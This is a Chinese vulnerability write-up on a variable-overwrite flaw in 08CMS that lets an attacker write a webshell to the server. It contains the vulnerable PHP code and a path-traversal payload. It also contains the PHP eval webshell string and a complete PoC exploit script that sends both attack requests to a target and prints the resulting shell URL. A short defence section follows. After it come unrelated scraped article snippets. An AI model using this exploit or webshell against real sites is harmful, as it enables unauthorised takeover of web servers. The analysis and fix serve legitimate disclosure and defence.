目录

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

简单描述这个漏洞

. /include/general.inc.php
//本地变量注册
foreach(array('_POST','_GET') as $_request)
{
foreach($$_request as $k => $v)
{
$k{} != '_' && $$k = maddslashes($v);
}
}
/*
这里实现了模拟GPC功能,将用户输入的GET、POST数据中的变量注册到本地代码空间中,导致攻击者理论上可以向应用程序"注入"任意的变量值
*/ . 通过本地变量覆盖,黑客可以控制目标应用程序将要进行的写文件操作,向网站目录下的任意位置写入任意文件

2. 漏洞触发条件

0x1: 攻击流

. 上传一个包含WEBSHELL的非PHP文件
/*
/tools/ptool.php
..
$cf = M_ROOT.'./dynamic/stats/aclicks.cac';
$ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';
..
if(@$fp = fopen($cf,'a'))
{
fwrite($fp,"$aid");
fclose($fp);
..
通过注入$aid,利用程序的本地变量覆盖漏洞,向/dynamic/stats/aclicks.cac写入WEBSHELL代码
$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
*/ . 在第二个变量覆盖攻击点,传入这个文件路径(将要被打开的文件路径):
$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac . 程序打开/dynamic/stats/aclicks.cac,并重新写入到"/dynamic/stats/aclicks.cac.php"中,完成GETSHELL

0x2: POC

<?php
/*
exp: index.php?tplname=../../dynamic/stats/aclicks.cac
汽车CMS Shell: /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
装修CMS Shell /dynamic/dynamic/stats/aclicks.cac.php
*/
//$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
$exp = '/tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E';
//$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac
$exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac'; if ($argc < )
{
print_r('
+---------------------------------------------------------------------------+
[+] php '.$argv[0].' [url]www.08sec.com[/url]
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(E_ERROR);
set_time_limit(); $host = $argv[];
go($host); function go ($host)
{
global $exp,$exp1; $re = Send ($host,$exp);
stripos($re, "MySQL") > ? Send ($host, $exp) : ""
$re = Send ($host, $exp1) && stripos($re, "aclicks.cac") > ? exit(" + Exploit Success!rn + http://$host/template/dynamic/stats/aclicks.cac.phprn") : exit(" - Exploit Failed!n");
} function Send($host,$url)
{
$data = "GET $url HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Accept-Language: en-usrn";
$data .= "Connection: Closernrn";
$fp = @fsockopen($host, );
if (!$fp)
{
die("[-] Connect to host Errorrn");
}
fwrite($fp, $data);
$back = '';
while (!feof($fp))
{
$back .= fread($fp, );
}
fclose($fp);
return $back;
}
?>

Relevant Link:

http://www.unhonker.com/bug/1390.html

3. 漏洞影响范围

08CMS全部商业版

4. 漏洞代码分析

本地变量注册实现代码

/include/general.inc.php

aaarticlea/png;base64,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" alt="" />

/index.php

include_once dirname(__FILE__).'/include/general.inc.php';
include_once M_ROOT.'./include/common.fun.php'; if_siteclosed();
mobile_open() || message('手机版尚未开放');
/*
function un_virtual($str)
{
......
$str = str_replace(array('/','-'),array('&','='),$str); 把 / 和 - 替换成 & 和 =
......
return $str;
}
parse_str()把查询字符串解析到变量中,保存在变量$temparr中
*/
parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);
... $_da = array();
if(!$cnstr)
{
//$tplname这个在这里定义的了,相当于被初始化了
$tplname = $_ismobile ? $o_index_tpl : $hometpl ;
$_da['rss'] = $cms_abs.'rss.php';
$_da += $temparr; // $_da= $_da+$temparr
unset($temparr);//销毁变量 //变量覆盖,这样我们可以控制了$tplname这个变量,即对它重新覆盖
extract($_da,EXTR_OVERWRITE);
//这个tpl_refresh函数就是漏洞利用的关键点
tpl_refresh($tplname);
...

/include/refresh.fun.php

function tpl_refresh($tplname)
{
global $templatedir,$debugtag;
$tdir = M_ROOT."template/$templatedir/"; //$tplname可以由攻击者控制,所以$cacf也等同于被攻击者控制
$cacf = $tdir.'pcache/'. $tplname.'.php';
if(file_exists($x = $tdir."function/utags.fun.php"))
{
include_once $x;
}
mmkdir($cacf,,);
if($debugtag || !file_exists($cacf))
{
//打开文件,返回内容
$str = load_tpl($tplname);
$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname); //file2str这个是打开文件的函数
$rt && $tpl = preg_replace("/{tpl\$(.+?)}/ies", "rtagval('\1','$rt')",$tpl); 过滤 $str = preg_replace("/<\?(?!php\s|=|\s)/i", '<?='<?'?>', $str);
$str = preg_replace("/<!--{(.+?)}-->/s", "{\1}", $str);
breplace($str,'');
nreplace($str);
quit_refresh_var(); $str = tpl_basecode($str); /*
漏洞的关键,在这里
1. $str: 攻击者可控制,这是一个.cac文件的内容,攻击者可以通过另一个变量覆盖向服务器写入一个.cac的WEBSHELL
2. $cacf: 攻击者可控制,攻击者传入的参数是一个非PHP文件路径(.cac文件),这个文件也是真实存在的,可以通过另一个变量注入上传一个.cac文件,同时,程序在末尾拼接了".php",使其成为写一个PHP文件 从结果上来看,相当于进行了一次.cac到.php的后缀重命名处理
*/
str2file($str, $cacf);
}
unset($str,$tdir,$cacf);
}

5. 防御方法

/index.php

if(!$cnstr)
{
//$tplname这个在这里定义的了,相当于被初始化了
$tplname = $_ismobile ? $o_index_tpl : $hometpl ;
$_da['rss'] = $cms_abs.'rss.php';
$_da += $temparr; // $_da= $_da+$temparr
unset($temparr);//销毁变量 /*
如果对应变量已经存在,则不进行覆盖操作
*/
extract($_da, EXTR_SKIP);
tpl_refresh($tplname);
...

6. 攻防思考

防御变量覆盖的防御思路

. 重新运行一次原始的代码逻辑,将被覆盖的变量再赋值回原始的值
. 在本地变量注册的入口处对关键字进行检测

Copyright (c) 2014 LittleHann All rights reserved

08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path的更多相关文章

  1. 【已解决】mac上appium报错:“Could not find aapt Please set the ANDROID_HOME environment variable with the Android SDK root directory path”

    按照网上教程配置完appium环境后,真机跑自动化过程,遇到如下报错: appium报错如下: [ADB] Checking whether aapt is present [ADB] The AND ...

  2. Could not find aapt Please set the ANDROID_HOME environment variable with the Android SDK root directory path

    写case写好好哒,突然debug的时候就冒出这个错误: selenium.common.exceptions.WebDriverException: Message: An unknown serv ...

  3. Appium问题解决方案(7)- Could not find 'adb.exe' in PATH. Please set the ANDROID_HOME environment variable with the Android SDK root directory path

    背景:运行代码提示找不到ADB An unknown server-side error occurred while processing the command. Original error: ...

  4. Scala中的override

    Scala中的override override是覆盖的意思,在很多语言中都有,在scala中,override是非常常见的,在类继承方面,它和java不一样,不是可写可不写的了,而是必须写的.如果不 ...

  5. 56.ERR! configure error gyp ERR! stack Error: Can't find Python executable "python", you can set the PYTHON env variable.

    Node.js 在安装模块的时候报错,缺少python环境. ERR! configure error gyp ERR! stack Error: Can't find Python executab ...

  6. Android 中的mvvm

    我们来了解一下MVVM模式与Databinding ,MVVM是一种模式,Databinding 是一种框架.DataBinding是一个实现数据和UI绑定的框架.而ViewModel和View可以通 ...

  7. 学习 java命令

    依稀记得自己第一次编译*.java文件,第一次运行*.class文件.但是六七年过去了,现在运行java写的程序更多的是用tomcat这种web容器.最近有个小需求,写一个监控zookeeper集群的 ...

  8. 智能电视TV开发---客户端和服务器通信

    在做智能电视应用的时候,最头疼的就是焦点问题,特别是对于个人开发者,没有设备这是最最头疼的事情了,在没有设备的情况下,怎么实现智能电视应用呢,接下来我是用TV程序来做演示的,所以接下来的所有操作是在有 ...

  9. Automake

    Automake是用来根据Makefile.am生成Makefile.in的工具 标准Makefile目标 'make all' Build programs, libraries, document ...

随机推荐

  1. asp中的md5/sha1/sha256算法收集

    对于asp这种古董级的技术,这年头想找一些有用的资料已经不容易了,下面是一些常用的加密算法: md5 (将以下代码另存为md5.inc) <% Private Const BITS_TO_A_B ...

  2. Autofac中的属性注入功能使用

    使用依赖注入容器时,大部分都是使用构造函数来注入或者是xml配置文件.也有很多支持属性注入.Autofac就是其中一个. 1 为什么要有属性注入? 对于一些使用特频繁的类或者方法,很多类都会用到,那么 ...

  3. 【一】我眼中的FeatureLayer

    1.来源 MapService 或者 FeatureService(10.0后)中的一个图层 Tabel 动态空间 2.使用 符号化 首先看下FLyr的继承关系:FeatureLayer  Graph ...

  4. 求解区间最值 - RMQ - ST 算法介绍

    解析 ST 算法是 RMQ(Range Minimum/Maximum Query)中一个很经典的算法,它天生用来求得一个区间的最值,但却不能维护最值,也就是说,过程中不能改变区间中的某个元素的值.O ...

  5. .NET技术在中国为什么老被人嫌弃

    这个话题有点自黑的意思,我从.NET 1.1开始玩.NET,到现在已经11年了,我是看着.NET成长起来,在中国壮大的,也见证了近几年.NET被各种嫌弃,其实说到底还是中国的架构师太少,我是说真正懂行 ...

  6. js 判断一组日期是否是连续的

    文章同步自个人博客:http://www.52cik.com/2016/07/10/consecutive-dates.html 这是群里一朋友问的问题,当时我说判断下 day 是否相邻即可,后来细想 ...

  7. java并发:简单面试问题集锦

    多线程:Simultaneous Multithreading,简称SMT. 并行.并发 并行性(parallelism)指两个或两个以上的事件在同一时刻发生,在多道程序环境下,并行性使多个程序同一时 ...

  8. spring boot/cloud 应用监控

    应用的监控功能,对于分布式系统非常重要.如果把分布式系统比作整个社会系统.那么各个服务对应社会中具体服务机构,比如银行.学校.超市等,那么监控就类似于警察局和医院,所以其重要性显而易见.这里说的,监控 ...

  9. 【BZOJ1002】【FJOI2007】轮状病毒(生成树计数)

    1002: [FJOI2007]轮状病毒 Time Limit: 1 Sec  Memory Limit: 162 MBSubmit: 1766  Solved: 946[Submit][Status ...

  10. MVC架构设计——EF-Code First

    详情参考:http://www.cnblogs.com/guomingfeng/archive/2013/05/28/mvc-ef-repository.html